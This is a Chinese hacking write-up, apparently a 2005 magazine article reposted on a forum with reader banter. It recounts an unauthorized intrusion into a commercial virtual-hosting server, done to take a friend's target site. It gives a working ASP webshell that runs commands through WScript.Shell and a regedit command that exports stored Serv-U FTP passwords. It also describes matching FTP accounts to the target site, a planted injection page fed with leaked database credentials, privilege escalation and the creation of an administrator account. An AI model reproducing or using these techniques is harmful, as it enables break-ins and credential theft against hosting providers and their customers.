万网:我进来玩过两次了
文章作者:Andyower 天使娃娃
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:本文已发表2005年9月的黑客防线.如有转载,请注名
近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因,所以本文有很多的截图都不能提供,希望大家可以谅解.
第一次渗透
先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11–1",全部返回正常,也就是说"'",";","–"," ",已经全部被过滤了,再去220.194.*.*去溜达一下,看见一个论坛,动网的,是前几天刚刚装上去的,注册人数不到50人,为了避免对方是骗人,把建站的日期修改,还是把最新的漏洞测试一下,都不能成功,想跨站?管理员就没有上过论坛.
这个时候,对www.***y.com扫描的报告出来了,开放21,80,3389,试着ftp上去看看.返回了信息如下:
C:\Documents and Settings\Andyower>ftp www.***d.com
Connected to www.tnbfriend.com.
220-Microsoft FTP for WinSock ready…
220 (欢迎您使用中国万网虚拟主机服务,本空间禁止使用聊天室,江湖游戏,在线视频播
放,专业下载等严重耗用服务器资源的程序,谢谢您的合作!)
User (www.tnbfriend.com:(none)):
显示的是"Microsoft FTP for WinSock ready",小样的,"serv-u',你以为你换了马甲我就不认识你啊,原因是因为出现了"220",一般来说,返回的信息有"220"的,就多半都是"serv-u"了.是万网的虚拟主机,听说万网的虚拟机被人搞过很多次了,不知道现在有没有学乖点呢.先不管这个,既然是虚拟主机,就几乎可以肯定的,一定可以旁注.
打开Domain3.5,设置好参数,过了没多久出来结果,上面捆绑了非常多的网站,看得我都不想看了,纯粹属于体力活,还好有天使娃娃在,这种事情就交给她吧.让她随便找到一个存在漏洞的网站,得到个webshell再说.(天使娃娃:为什么受伤的总是我……)
不知道是因为天使娃娃的命好还是人品好,才不到10分钟,就拿下了一个年老失修的动网,并且把一句话木马写好了,就等着我去连接了.我比较喜欢海阳顶端木马,配合起一句话非常的好用。连接上去以后,看见了许多的站点.如图1:
随便点击一个进去看看,发现没有权限,也许是为每个用户都提供了一个帐号吧.再看看其他的东西,发现不能执行cmd,自己上传了一个cmd.exe上去,发现还是不能执行.因为现在我用的这个海洋不是最新的版本,所以没有查看组件的功能,在没有查看组件前,很多的东西都是不能确定的.这次,上传了另外一个海洋,查看组件.如图2:
最重要的2个组件可以用:Shell.Application ,WScript.Shell,也就是说WScript.Shell被改名了,但是还是存在的,这种小事难不到偶滴,马上弄了段代码上去,内容如下<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>
提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令.如图3:
现在已经可以运行cmd命令了,在这里我想说一下,在组件探测的时候,探测到WScript.Shell不存在也有可能可以执行命令的.在这补充一下,写完这文章的时候,突然发现,其实海洋就直接提供有这个功能了,只是我一直没用到.只要在执行Wscript.Shell的页面,点击使用Wscript.Shell,然后在下面的命令框下写自己的cmd.exe的路径写上去,例:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an",这个效果和我用的效果是一样的.(在此感谢Lcx大哥提供那么好用的马儿).
在netstat -an的时候.有一条值得注意'TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING",和想象中的一样,既然是这样子,把早就准备好了的serv-u本地提升权限的程序弄上去,试了几个都不能成功,难道说密码改了?前面我已经试过跳转目录,在"C:\Documents and Settings\All Users\「开始」菜单\程序\"找到了serv-u的目录,并且下载了快捷方式,得到路径以后,尝试跳到serv-u的目录,已经试过了,不能的跳转,做了限制.就这样的放弃了?不能,当然不能了,都做到这一步了,放弃了太可惜了.不知道大家记得不记得6月的黑防,下雨天[F.S.T]写的那篇文章:"serv_u FTP 再暴本地权限提升漏洞",也许很多人没有注意到吧,可能是因为觉得局限性非常的小,但是,我可以告诉你们,成功率高达80%,为什么呢?因为现在的虚拟主机商都怕了serv-u本地权限提升漏洞,所以,他们很都的管理员都是把密码存放在注册表里面,也就是说,符合了下雨天文章所说的要求,帐号和密码存放在注册表里面.不记得的读者们请重新的翻开书来看看吧.我也不想废话那么多,直接看怎么实现的吧,在webshell那,执行命令:regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" ,就会把注册表的中的serv-u的帐号密码全部的导出到了C:\Documents and Settings\All Users\Documents\system.ini这个文件里面,当然了前提是:C:\Documents and Settings\All Users\Documents\ 这个文件是可写的,如果不能写的话,自己换一个可以写的目录吧.然后下载system.ini文件,打开一看!呆了!如图4:
所有的人的帐号密码都是明文的,在这里想说一下,因为我们的权限是Guests的,所以是根本没有权限往注册表里面写入一个管理员的帐号和密码,而且为了证明自己的想法,偶也在本机测试过,在Guests下,是没有任何权限往注册表修改或者是添加删除的.很多的办法都试过了,还是不行.跳转到c:\winnt\下,非常多的KB*.log文件,这些都是补丁的日志,最新的一个补丁就是在昨天打的,也许是因为开启了windows自动更新的功能,我猜想管理员才不会那么的勤快.
现在我们已经有了所有用户的ftp帐号和密码,关键就是找到ftp帐号密码所对应的网站了,但是他的网站的目录都是按顺序的,从目录根本没有办法猜到哪个目录对应着哪个网站,400多个站点啊!一个个手工的测试的话,会让人疯掉的.我现在休息一下.体力活,让天使娃娃来吧.(天使娃娃:为什么受伤的又是我……)至于在得到所有ftp帐号和密码的情况下怎么知道哪个ftp对应的是哪个网站,我也说说吧,先找出目标网站的特殊一点的网页名字,然后一个个帐号密码的登陆,用ls命令来查看,是不是存在那个文件,如果不存在就下一个,如果存在,还要再仔细的查看其他的文件,是不是都符合要求,存在不存在那个站点的其他的文件.晕了吧,没事,实例说明一切.
先上www.***d.com网站,找几个特殊的文件,在这里,我找到的是http://www.***d.com/sqrd.htm ,还有http://www.***d.com/yuq.htm .得到文件名,sqrd.htm还有yuq.htm,然后从cn23001这个帐号开始,用得到的帐号和密码登陆,登陆进去以后,发现没有sqrd.htm文件的就直接跳过去了,如果存在sqrd.htm文件,再看看有没有yuq.htm文件.如果都存在,说明很大可能就是这个ftp帐号了,对了,还忘记说了一下,在system.ini文件里面,重要的就是2样东西.第一个:[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,帐号就是cn23017,第二:密码就是在下面的"Password"=这里是密码,一个个的慢慢试吧.我去睡觉了,累死了.
一觉醒来,天使娃娃很郁闷的对我说,还是没有找到,他都试到了cn23217了,已经累得不行了,上网查查有没有相关的软件,查不到,算了,还是我们伟大的领袖毛主席说得好,自己动手丰衣足食.自己写一个程序来针对性的暴力破解吧.花了点时间把程序写好,程序界面如下图5:
界面是难看了一点,因为赶时间嘛,写个程序花了半个多小时,再美化的话又要花几个小时了,简直是浪费时间.能用就可以啦.说名一下,"ftp主机名"不用说了吧.对方的ftp的地址,"特殊文件名"填写的是要得到的ftp对应的网站的特殊文件名,这个已经在文章中说名了的."从第几个ftp帐号开始…",这个地方,按照自己的要求来写,因为偶在测试的时候,有的时候读取到100多个,程序就挂了,如果重新开始又太麻烦,所以就加上这个选项,防止程序挂了以后,不用重新开始读取,默认写1就可以了,意思是从文件中的第一个ftp帐号开始测试,其他的就不用写啦,就等着帐号出来吧.还有一点,因为为了节约时间.我没有用到多线程,所以就自动跳出对话框来代替了多线程,防止程序死锁.等下次有时间或者是有人觉得好用,我再完善吧.现在就这样将就着先吧.下面是我的测试.如图6:
我是从第4个帐号开始读取,当登陆的ftp下存在index.asp这个文件的时候,就会把帐号和密码再列出来,方便吧.到了这里也许会有人问,万一有几个网站都存在着一样的特殊文件名呢?呵呵,这个时候,就需要自己动一下手啦,不能那么懒的.
不到几分钟,已经测试完了,其中的一个帐号存在着我写的特殊的文件名,就他了.手工ftp进去看看,完全就是这个站点了,小样的,www.***d.com,你以为你躲着深我就找不到你了啊!哈哈!一样让你跑不掉!ls命令看看.发现一个conn.asp文件,打开来看看,既然是另外一个主机的连接信息:<%
dim conn
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194.*.*;uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
再次渗透
这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
偶马上就在本地架设了一个IIS,然后把他的conn.asp文件弄到我的虚拟目录下.再构造一个存在注入点的文件a.asp,里面的admin表是存在的,代码如下:
<!–#include file="conn.asp"–>
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id '如果没有这个表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录,web目录在d:\wwww,还装了serv-u,这个服务器因为是自己的,所以不会那么专业吧,应该不会设什么防的.先得到webshell再说,db_owner的权限可以备份数据库,我用xiaolu的getwebshell.exe,备份数据库文件到d:\www\1.asa,结果不能运行!出错!原来该死的数据库中存在<% 这个东西,没办法,运气一向不是很好,这次又是个很好的理由.慢慢的找到数据库中看哪个字段存在<%的内容,删除!
又花了半个小时找出来了,用SQL语句把他删除,再备份,这次成功了.成功的拿到webshell,觉得不好看的,重新写一个webshell进去吧,接着就是serv-u提升权限,添加一个帐号,设置成为管理员,3389登陆进去,爽死了!什么都有了,把帐号密码给朋友吧,他爱怎么搞是他的事情了,我的任务已经完成.
注意:由于本文图片为引用 为了避免图片失效 上传含图pdf附件提供大家下载 欢迎使用adobe 生成PDF文件可以较好的保护您的版权 您可以同步发出含图主题和PDF 不用担心别人转载文章删除您的附加信息 因为还有PDF可以说明一切
:wink: :wink:
里面有没有MM? :oops: :lol:
:mad: 机子里应该有美女图。。。
share..
:lol: 下次发一张美女图给你
明天给转了. 刚从重庆那边回来…
累… 睡觉去了..
我这几天还找你了,找不到你.看到的话,QQ上跟我说话,我有事
………………..Q你了 你没回..
:mad: 都没收到.